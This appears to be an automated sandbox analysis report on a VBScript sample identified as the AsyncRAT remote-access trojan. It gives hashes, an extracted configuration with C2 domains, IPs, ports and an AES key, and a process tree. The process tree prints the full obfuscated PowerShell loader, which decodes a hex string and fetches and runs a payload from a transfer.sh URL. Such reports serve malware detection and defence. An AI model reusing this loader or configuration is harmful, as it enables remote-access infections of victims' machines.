Analysis

  • max time kernel
    114s
  • max time network
    145s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    14/08/2021, 06:40

General

  • Target

    W092.vbs

  • Size

    1KB

  • MD5

    eaecbd393f2fffd8522e5d4c7b8b6f7d

  • SHA1

    6a9ac84f1c4778cf41ef45b2906919f99a06acf5

  • SHA256

    414a79e6c87489cb73e9176e867d554788a28ba86cb4e00f3f8fed15400999bd

  • SHA512

    8c24cf0f221c9de102adbfc21f3f762a06b4041963534021ffa7ba4174e149577adb00425066157c9257c3a0f407490754bf58090f8da9096cbe8970b57a42ae

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://transfer.sh/1T8qkDx/ko.txt

Extracted

Family

asyncrat

Version

0.5.7B

C2

asyncpc.duckdns.org:6650

asyncpc.duckdns.org:9034

asyncpc.duckdns.org:6890

asyncpc.duckdns.org:7829

13.77.222.211:6650

13.77.222.211:9034

13.77.222.211:6890

13.77.222.211:7829

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • aes_key

    PYYzntkVFJfMofAe4qQYi6HmHf8Kj3BT

  • anti_detection

    false

  • autorun

    false

  • bdos

    false

  • delay

    Default

  • host

    asyncpc.duckdns.org,13.77.222.211

  • hwid

    3

  • install_file

  • install_folder

    %AppData%

  • mutex

    AsyncMutex_6SI8OkPnk

  • pastebin_config

    null

  • port

    6650,9034,6890,7829

  • version

    0.5.7B

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)

    suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)

  • Async RAT payload 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\W092.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:748
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $TRUMP ='http://transfer.sh/1T8qkDx/ko.txt';$SOS='24-42-20-3d-27-45-54-48-20-43-4f-49-4e-74-2e-57-54-46-20-43-4f-49-4e-6c-49-4f-53-4e-54-27-2e-52-65-70-6c-61-63-65-28-27-45-54-48-20-43-4f-49-4e-27-2c-27-6e-45-27-29-2e-52-65-70-6c-61-63-65-28-27-54-46-20-43-4f-49-4e-27-2c-27-45-62-43-27-29-2e-52-65-70-6c-61-63-65-28-27-4f-53-27-2c-27-65-27-29-3b-24-43-43-20-3d-20-27-44-4f-53-20-43-4f-49-4e-20-4c-53-4f-53-43-4f-49-4e-6e-47-27-2e-52-65-70-6c-61-63-65-28-27-53-20-43-4f-49-4e-20-27-2c-27-57-6e-27-29-2e-52-65-70-6c-61-63-65-28-27-53-4f-27-2c-27-6f-61-44-27-29-2e-52-65-70-6c-61-63-65-28-27-43-4f-49-4e-27-2c-27-54-72-49-27-29-3b-24-41-20-3d-27-49-60-45-6f-73-20-43-4f-49-4e-60-57-60-42-54-43-20-43-4f-49-4e-6a-60-45-54-48-20-43-4f-49-4e-20-24-42-29-2e-24-43-43-28-24-54-52-55-4d-50-29-27-2e-52-65-70-6c-61-63-65-28-27-6f-73-20-43-4f-49-4e-27-2c-27-58-28-6e-60-65-27-29-2e-52-65-70-6c-61-63-65-28-27-42-54-43-20-43-4f-49-4e-27-2c-27-2d-4f-62-27-29-2e-52-65-70-6c-61-63-65-28-27-54-48-20-43-4f-49-4e-27-2c-27-60-63-60-54-27-29-3b-26-28-27-49-27-2b-27-45-58-27-29-28-24-41-20-2d-4a-6f-69-6e-20-27-27-29-7c-26-28-27-49-27-2b-27-45-58-27-29-3b';Invoke-Expression (-join ($SOS -split '-' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:812
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2872

Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/812-142-0x000001E10BDE8000-0x000001E10BDE9000-memory.dmp

          Filesize

          4KB

        • memory/812-164-0x000001E10D5F0000-0x000001E10D5F1000-memory.dmp

          Filesize

          4KB

        • memory/812-123-0x000001E125FB0000-0x000001E125FB1000-memory.dmp

          Filesize

          4KB

        • memory/812-124-0x000001E10BDE0000-0x000001E10BDE2000-memory.dmp

          Filesize

          8KB

        • memory/812-125-0x000001E10BDE3000-0x000001E10BDE5000-memory.dmp

          Filesize

          8KB

        • memory/812-126-0x000001E10BDE6000-0x000001E10BDE8000-memory.dmp

          Filesize

          8KB

        • memory/812-119-0x000001E125CD0000-0x000001E125CD1000-memory.dmp

          Filesize

          4KB

        • memory/812-153-0x000001E10D5C0000-0x000001E10D5EA000-memory.dmp

          Filesize

          168KB

        • memory/2872-158-0x0000000000400000-0x0000000000412000-memory.dmp

          Filesize

          72KB

        • memory/2872-165-0x00000000052A0000-0x00000000052A1000-memory.dmp

          Filesize

          4KB

        • memory/2872-166-0x0000000005BE0000-0x0000000005BE1000-memory.dmp

          Filesize

          4KB

        • memory/2872-167-0x0000000006180000-0x0000000006181000-memory.dmp

          Filesize

          4KB

        • memory/2872-168-0x0000000005C80000-0x0000000005C81000-memory.dmp

          Filesize

          4KB